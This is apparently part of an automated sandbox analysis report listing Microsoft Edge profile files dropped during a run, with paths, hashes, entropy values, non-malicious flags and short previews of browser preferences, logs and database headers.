Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\46d6dbf8-7a5d-4d8b-923d-1ddd257ccc35.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46002
Entropy (8bit):	6.088822221428491
Encrypted:	false
SSDEEP:	768:EMkbJrT8IeQc5d99jsu5hDO6vP6OW8tBBICEFTYgIQmxgRCAoaGoup1Xl3jVzXrP:EMk1rT8H199U64IQ9Roahu3VlXr4Q
MD5:	91458237885A14C6E3ABF2F9280EF3A4
SHA1:	420D861378A28A845B5CF9DC49AB152E4266CAFA
SHA-256:	3D485CE4E6F5359B723B75A788AF348FC4FF9ADE483270C2D3ECDABD2851B9E5
SHA-512:	DBE7916FAADA065C1355B59C887BFB11D0CE71B340EBA5D0BA9AFB19CD9F10625A478FCA5C86C62712B39DC5C5E91128F37498DBF05F8D3285A57CD54CEEA590
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1732530839"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6790d195-345f-4a4c-adb1-8bf6440dc945.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.0907333777376556
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMDwuF9hDO6vP6O+0tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEP6Ftbz8hu3VlXr4CRo1
MD5:	C0461D18550444E38DC4701ACAA915E8
SHA1:	662BEEC4E25CA422791AC22758C9AEA10D553652
SHA-256:	EDB384573BD2B520B19FE4A9DBE1D38AFB550863EDF16522FAD08BB874492C84
SHA-512:	F98D13321684CE2FF63549DFE168FE2D8EAFA569857DE877AAE7D1C9F8D519654BF33DA27D8E404ACC4EB983BC91C7EBDA38553A92273D1FB832BE153C2F6506
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67445291-1D64.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.4537698945519866
Encrypted:	false
SSDEEP:	3072:hPdezJFyf1USLYt0CPkcBL6rPru1Vc9S+pY6LVhqojg1HFKwJo:Xez29Yt04kcBqDlS+9LVhqojaHUwJo
MD5:	C027D234C8CF2E056BDE2BBEC2876FD1
SHA1:	A18A6E29CCE030AB0184796790FFEBFF1A3B289F
SHA-256:	9D5310D201A3F1B326454626F22E9701E0FE45ED2949526E9FCB870221D33C0C
SHA-512:	8F86F51105CFE0DEF480C3F4FBD638F6C615B37C4FD3FA6F30C1A8C1A6B3AB6C1586A0ED660ADCCE11C5450ABC150F8ECC12ABD9BD6B2DFD23A3AC286D0FE5BD
Malicious:	false
Preview:	...@..@...@.....C.].....@...................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".ybuxaw20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2.......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.132041621771752
Encrypted:	false
SSDEEP:	3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
MD5:	845CFA59D6B52BD2E8C24AC83A335C66
SHA1:	6882BB1CE71EB14CEF73413EFC591ACF84C63C75
SHA-256:	29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
SHA-512:	8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
Malicious:	false
Preview:	sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1d4593ad-319d-4a17-91c3-cb420270ef48.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17533), with no line terminators
Category:	dropped
Size (bytes):	17534
Entropy (8bit):	5.480286645307395
Encrypted:	false
SSDEEP:	384:stpPGQSu4wsIQKfhxRppsoeBhihbc+9dqVsh4bGiQwg6WPlaTYXh:s7OXuBQKfzeZbGRvZaTYXh
MD5:	376B1B098D0D76F10512D2DC456841C7
SHA1:	31300804EFD3CA750619DA1C03A8D6A024795BEA
SHA-256:	F50F713C14077279CDC74F966311E70E12F1344A583A20596C4318D5723AF31E
SHA-512:	37665A71836D8A725CEC32AA9670F2BD6D5AD6C7861102EB1FC0A7101E06D0EB8CA0E1D2302C9C351D9D437506B4B9AF87F45BE5E9CFCE1D78C83D3BAB38649A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377004434518745","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\34a9345a-e8da-4d26-9188-daed980a99c4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\41ceb599-96b5-49ed-bfd4-577df6f4893f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\462e8309-9cda-4c9c-94f2-ac283816e65a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17368), with no line terminators
Category:	dropped
Size (bytes):	17369
Entropy (8bit):	5.483473822521164
Encrypted:	false
SSDEEP:	384:stpPGQSu4wsIQKfhxRppsoeBhihbc+9dqVsh4bGiQwg6WUaTYXh:s7OXuBQKfzeZbGRvIaTYXh
MD5:	94ADC04A598BCBD9A7695D3DCC43607C
SHA1:	68681ED4CC5194C2BD623D04B97B71FB5398F6FE
SHA-256:	BD7DE58CA9BABC9119CCC69274D5EF049D48F39DE0E85EA7D8B12102F28FF998
SHA-512:	B05F237231E14B9258BA0773C3417C181F7DF2079A9BE871C46DD5A40BFD5D8E6EEFA45B745889555DC50003CACB853C6086ED3CC175CC0C7188E04D5966D3F7
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377004434518745","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6cd9719b-a6f4-4c37-9d36-cca31a70c159.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17183), with no line terminators
Category:	dropped
Size (bytes):	17184
Entropy (8bit):	5.48526243638778
Encrypted:	false
SSDEEP:	384:stpPGQSu4wsIQKfhxRppsoeBhihbc+9dqVMbGiQwg6WqaTYXh:s7OXuBQKfzeqbGRvGaTYXh
MD5:	DC6B2D82A7D375180F87CF74AFC5F61B
SHA1:	0AC08BEACCBCBCDAFC3B4EB7CFB0BB8E37540979
SHA-256:	55D4611601F5C96C0C27FFAB209B1902CCC56DE5CA511716298AD659433589D5
SHA-512:	37E349C75A6882D79973B742DB0DEF0B64EC3340E1C43BC5BD4580DCFB4542D95D620A7643F7FBE123877D9E89CBF5391C33A778FAF39692EA92B3B44057667D
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377004434518745","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\85879299-3e57-4e2b-9bc5-39936979e919.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40504
Entropy (8bit):	5.561664125205216
Encrypted:	false
SSDEEP:	768:dMENUC9H7pLGLPtbWPMCfr18F1+UoAYDCx9Tuqh0VfUC9xbog/OVSp/wvV2rwh3s:dheC9BcPtbWPMCfr1u1jaPp/YVTh3O0k
MD5:	8ACDB9A0E6E7B86FFE8F67993D7E7914
SHA1:	62E2B6C36E84AEECFAC4F22D79AC271AE8F6977F
SHA-256:	7CC44AAD64BA495CFF6EE36CE8ED4ACBA84AF7288201D7EB287D671B7641A21D
SHA-512:	B260934CBEB8CFDF674BC868AA543ED2954E4E6436998461973875ECEE6F9BEF95384967C2B7DDF630B392764C0A9DE0C1FB253EB9436C3240293B92B86E5C54
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377004433895179","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377004433895179","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	307
Entropy (8bit):	5.263209492909348
Encrypted:	false
SSDEEP:	6:HAXQcR1923oH+Tcwtp3hBtB2KLlVAXQcDMi+q2P923oH+Tcwtp3hBWsIFUv:gAc8Yebp3dFLoAc4i+v4Yebp3eFUv
MD5:	F2B307203A5FEB04AB192969AD040E0F
SHA1:	CA5124447F2C9C60E89D6E99664B9E0EFC8BD13C
SHA-256:	5B5EB85638D08ADC74A61A2E46980F5C4D3B9ACF9CE772BF7F784C9B77E87ACD
SHA-512:	9852A3EDE35232612FF6F021E89E1C1DB7D1501F2661B230CB5B17DC6025C27992B28754A2D5A26D617EAEF0FF9348C1B0E9A398554459B00937CAB2AF601E14
Malicious:	false
Preview:	2024/11/25-05:33:59.277 6ec Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/25-05:33:59.303 6ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	2163821
Entropy (8bit):	5.222866437092525
Encrypted:	false
SSDEEP:	24576:v+/PN8FufI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8Efx2mjF
MD5:	3A6736BD9329BF0BCAB0EA2FC53D56FC
SHA1:	0E16C7C5DE75F02A1E19D9C4DF73B2F64820315F
SHA-256:	182EF3C690D94416A449EA985BE0FA3E0A937E3E5A76B4524FE84AFDD4F448DE
SHA-512:	B3A7D3F04FD3357C6ABE6E88239CF4E6398EC802DF34B21A94ACF718F217149A8C6C697F7F46687057B44A601923A0FDDFDD935D00E9787200C0C635360D6136
Malicious:	false
Preview:	...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4...13340900604462938.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.10719732051201
Encrypted:	false
SSDEEP:	6:HAXQcfVOq2P923oH+Tcwt9Eh1tIFUt8YAXQcOZmw+YAXQcg5kwO923oH+Tcwt9Er:gAc9Ov4Yeb9Eh16FUt87AcO/+7Acg55s
MD5:	B75456072D47642D986F5CB51FEB8599
SHA1:	E5B56F4593A5E5C38D55A31B8DF1439972FF8826
SHA-256:	7C9900B9B82405D497C738A8890E495116B299A8839FF46C8DE83D635E283E18
SHA-512:	05F68B89D2000A3F73AE2083552EC3A7FDF0E93152C1FD8505342405955B9EEEC19735E219340B3A0761D897DE730F90E4A91056B53BA78BF396DBFBC86EF235
Malicious:	false
Preview:	2024/11/25-05:33:59.135 1950 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/25-05:33:59.141 1950 Recovering log #3.2024/11/25-05:33:59.145 1950 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.10719732051201
Encrypted:	false
SSDEEP:	6:HAXQcfVOq2P923oH+Tcwt9Eh1tIFUt8YAXQcOZmw+YAXQcg5kwO923oH+Tcwt9Er:gAc9Ov4Yeb9Eh16FUt87AcO/+7Acg55s
MD5:	B75456072D47642D986F5CB51FEB8599
SHA1:	E5B56F4593A5E5C38D55A31B8DF1439972FF8826
SHA-256:	7C9900B9B82405D497C738A8890E495116B299A8839FF46C8DE83D635E283E18
SHA-512:	05F68B89D2000A3F73AE2083552EC3A7FDF0E93152C1FD8505342405955B9EEEC19735E219340B3A0761D897DE730F90E4A91056B53BA78BF396DBFBC86EF235
Malicious:	false
Preview:	2024/11/25-05:33:59.135 1950 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/25-05:33:59.141 1950 Recovering log #3.2024/11/25-05:33:59.145 1950 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.46271450457888236
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuUy:TouQq3qh7z3bY2LNW9WMcUvBuL
MD5:	38C76FED97318C32F48D7261A9A87A84
SHA1:	DBC5D91C11ED005FB77E8E9E5B7CAAEA7AB839EF
SHA-256:	75CB4D7C6558F4A0CFFC761B1DA4C4A6B68018695580BFD8ED5A77DA7F5A0B38
SHA-512:	9A6B27E9C8DEB23326A52A1F237FA02E1A41A5DB0ECB0157187B8E6F9EEA2EC5EFF5466AF8692A09602B0AE775B65D470BC3A58B5D8E28BDE09832AAA833FCF1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
